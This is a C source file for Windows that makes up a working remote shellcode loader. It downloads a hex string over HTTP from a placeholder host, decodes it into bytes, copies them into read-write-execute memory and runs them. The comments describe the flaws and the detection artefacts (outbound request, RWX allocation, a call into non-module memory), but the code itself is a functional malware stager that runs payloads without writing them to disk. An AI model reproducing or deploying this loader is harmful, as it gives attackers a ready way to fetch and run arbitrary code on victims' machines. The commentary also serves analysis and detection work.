| #include <stdio.h> #include <Windows.h> #include <WinInet.h> #pragma comment(lib, "WinInet.lib")
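/*
 * GetUrlPage - issue one HTTP GET through WinINet and return the response body.
 *
 * URL     : host name or address handed to InternetConnectA (not a full URL).
 * SubPath : object path handed to HttpOpenRequestA, e.g. "/index.txt".
 *
 * Returns a zero-filled, NUL-terminated buffer of 64 * 2048 bytes allocated
 * with new BYTE[], holding at most 64 * 2048 - 1 bytes of the body, or NULL
 * when any WinINet call fails. The caller owns the buffer and releases it
 * with delete[] (as BYTE *).
 *
 * Security-relevant properties of this request:
 *  - It goes to INTERNET_DEFAULT_HTTP_PORT with INTERNET_SERVICE_HTTP, so the
 *    body arrives over cleartext HTTP with no integrity or origin check.
 *    Callers must treat the returned bytes as untrusted input.
 *  - The HTTP status code is not inspected; an error page is returned like
 *    any other body.
 *  - Only one InternetReadFile call is made, so data not delivered by that
 *    call is not part of the result.
 *  - The agent string "WinInetGet/0.1" is fixed and is what the request
 *    presents as its User-Agent.
 */
char * GetUrlPage(const char *URL, const char *SubPath)
{
    const DWORD dwBufSize = 64 * 2048;
    const DWORD dwOpenRequestFlags =
        INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP |
        INTERNET_FLAG_KEEP_CONNECTION |
        INTERNET_FLAG_NO_AUTH |
        INTERNET_FLAG_NO_COOKIES |
        INTERNET_FLAG_NO_UI |
        INTERNET_FLAG_RELOAD;

    HINTERNET hInternet = NULL;
    HINTERNET hConnect = NULL;
    HINTERNET hRequest = NULL;
    BYTE *pBuf = NULL;
    DWORD dwRet = 0;

    // Each step runs only if the previous handle was obtained, so a failed
    // call is never followed by calls on a NULL handle.
    hInternet = InternetOpenA("WinInetGet/0.1", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
    if (NULL != hInternet) {
        hConnect = InternetConnectA(hInternet, URL, INTERNET_DEFAULT_HTTP_PORT, 0, 0, INTERNET_SERVICE_HTTP, 0, 0);
    }
    if (NULL != hConnect) {
        hRequest = HttpOpenRequestA(hConnect, "GET", SubPath, NULL, NULL, NULL, dwOpenRequestFlags, 0);
    }

    // The raw response headers were previously copied into a scratch buffer
    // that was never read or freed; that query is dropped.
    if (NULL != hRequest && HttpSendRequestA(hRequest, NULL, 0, NULL, 0)) {
        pBuf = new BYTE[dwBufSize];
        RtlZeroMemory(pBuf, dwBufSize);

        // Read at most dwBufSize - 1 bytes so the last zeroed byte always
        // terminates the string, even when the body fills the buffer.
        if (!InternetReadFile(hRequest, pBuf, dwBufSize - 1, &dwRet)) {
            delete[] pBuf;
            pBuf = NULL;
        }
    }

    // Release handles in reverse order of creation on every path.
    if (NULL != hRequest) {
        InternetCloseHandle(hRequest);
    }
    if (NULL != hConnect) {
        InternetCloseHandle(hConnect);
    }
    if (NULL != hInternet) {
        InternetCloseHandle(hInternet);
    }

    return (char *)pBuf;
}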
/*
 * main - download a text resource, decode it from hex, and transfer control
 * to the decoded bytes.
 *
 * Behaviour visible in this block, in order:
 *  1. GetUrlPage fetches a text body from a remote host.
 *  2. The body is treated as a hex string; each pair of characters becomes
 *     one byte in a calloc'd array.
 *  3. A region is committed with PAGE_EXECUTE_READWRITE, the bytes are
 *     copied in, and the region is called through a function pointer.
 *
 * For analysis and detection: the bytes that get executed never exist as a
 * file on disk in this flow. The observable artefacts are the outbound HTTP
 * request, a private allocation that is writable and executable at the same
 * time, and a call whose target lies in that allocation rather than in a
 * loaded module.
 */
void main() {
    // The two arguments are unfilled placeholders (Chinese for "IP address"
    // and "shellcode file path"); the listing is a template.
    // GetUrlPage returns NULL when the connection cannot be set up, and the
    // result is used below without a NULL check.
    char *shellcode = GetUrlPage("ip地址", "/shellcode文件路径");
    // Prints the downloaded hex text to stdout.
    printf("%s \n", shellcode);
    // Length in characters of the hex text; two characters encode one byte,
    // hence the "/ 2" in every size below.
    int shellcode_length = strlen(shellcode);
    // Zero-initialised staging buffer for the decoded bytes (never freed;
    // the allocation result is not checked).
    unsigned char* value = (unsigned char*)calloc(shellcode_length / 2, sizeof(unsigned char));
    for (size_t count = 0; count < shellcode_length / 2; count++) {
        // Parse up to two hex digits into one byte. The sscanf_s return
        // value is ignored, so a non-hex pair leaves the zero from calloc.
        sscanf_s(shellcode, "%2hhx", &value[count]);
        // Advances the only pointer to the downloaded buffer, so the
        // original allocation can no longer be released.
        shellcode += 2;
    }
    // Region is writable and executable at once (PAGE_EXECUTE_READWRITE);
    // the VirtualAlloc result is not checked before memcpy.
    void *exec = VirtualAlloc(0, shellcode_length / 2, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, value, shellcode_length / 2);
    // Casts the region to a no-argument function and calls it: control
    // passes to bytes supplied by the remote host, with no validation of
    // their content or origin anywhere in this file.
    ((void(*)())exec)();
}